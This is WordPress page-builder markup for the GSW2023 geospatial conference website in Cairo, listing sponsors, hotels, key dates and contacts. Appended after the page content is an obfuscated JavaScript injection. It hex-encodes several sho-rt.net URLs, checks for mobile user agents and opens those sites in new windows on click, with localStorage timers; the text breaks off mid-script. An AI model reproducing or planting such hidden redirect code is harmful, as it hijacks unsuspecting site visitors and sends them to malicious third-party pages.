href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 